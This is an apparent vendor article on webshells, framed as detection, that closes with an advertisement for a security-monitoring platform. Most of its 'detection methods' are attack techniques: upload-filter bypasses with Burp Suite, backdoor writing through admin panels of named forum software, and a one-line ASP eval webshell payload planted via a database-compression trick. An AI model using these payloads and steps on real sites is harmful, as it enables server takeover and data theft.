Webshell即 Web入侵的脚本攻击工具,网络犯罪分子通过网站端口入侵获取服务器操作程序权限。如:执行系统命令,窃取用户数据,修改主页等操作。
Webshell是动态网页脚本。简单理解就是网站的后门工具。比如就一个庭院,设计了前门和后门,而我们正常的情况下关注最多都是前门,后门会被忽视掉,这就给小偷提供了机会,造成财物失窃等损失。网络犯罪分子利用Webshell长期对网站服务器进行控制,修改系统程序或者服务器后台FSO权限,使用户只有小部分的权限;经添加修改上传Webshell或者利用漏洞等上传木马,病毒文件或者别的非法文件,也会获取用户的敏感数据。
Webshell攻击有极强的隐蔽性,一些恶意网页脚本通过嵌套在正常网页脚本中运行,不易被发现以及查杀。
那么如何能够发现Webshell攻击呢?
Webshell检测的方法其实有很多,下面针对获取Webshell总结了几种方法。
【1】 我们可以通过”Webshell系统行为特征是修改的检测”这个思路来预防。
Webshell攻击者上传Webshell总会做些什么,那么就可以去监测系统的变化以及敏感的操作,尽可能的去收集服务器的信息,通过和之前的配置以及文件的变化对比监测系统达到尽可能发现Webshell的效果。
【2】 可以使用Burp Suite工具,修改上传文件信息,逃避验证。
现在很多脚本程序的上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型 为php.g1f的脚本程序。这是php的一个特性,最后的那个只要不是已知的文件类型即可。php会将php.g1f作为php来正常运行,从而也可成功拿到。shell.LeadBbs3.14后台获得 Webshell的方法是:在上传类型中增加asp 。注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格!
【3】 可以利用后台管理功能写入Webshell。
我们进入后台后还可以通过修改相关文件来写入Webshell。比较的典型的有dvbbs6.0,还有 leadbbs2.88等。直接在后台修改配置文件,写入后缀是.asp的文件。而LeadBbs3.14后台获得Webshell的另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell。
【4】 利用数据库压缩功能可以将数据的防下载失效从而使插入数据库的最小马成功运行。
比较典型的就是loveyuki的L-BLOG,在友情添加的url出写上<%eval request (chr(35))%>。提交后,在数据库操作中压缩数据库,可以成功压缩出.asp文件,用海洋的最小马的eval客户端连就得到一个Webshell。
以上都是人工操作,有的时候对于一些加密或者经过特殊处理的Webshell文件和隐藏在正常文件中的后门以及大马(被恶意使用的大段正常代码)无法准确做出判断。窃密型Webshell通常具有和正常的Web脚本文件具有相似的特征,这时候就是需要使用专业的检测工具进行检测监控。
南京聚铭网络科技有限公司旗下安全态势感知与管控平台(简称BDSEC),平台以旁路的方式部署于网络中。部署运行时,仅需要将被监控的网络设备、服务器的安全日志指向BDSEC,BDSEC根据日志数据分析就能够及时发现、及时预警,并联同解决方案一起告知用户,部署便捷且操作十分方便。
作为聚铭网络重要的网络安全产品,聚铭安全态势感知与管控平台是基于大数据、人工智能技术为基础的安全态势感知与管控平台。
平台能够统一采集各类结构化和非结构化的数据,包括各类设备、应用日志以及网络流量和各种脆弱性。通过实时分析、离线分析、关联分析、统计分析、机器学习、规则库、专家经验库以及强大的安全情报源碰撞,进行多维度的风险分析和深度、广泛的检查,从而准确、高效地感知整个网络的安全状态以及发展趋势,帮助客户及时发现与处置安全问题,保障信息系统的安全。
—- END —-
来源:freebuf.com 2021-04-29 19:27:29 by: 南京聚铭网络
请登录后发表评论
注册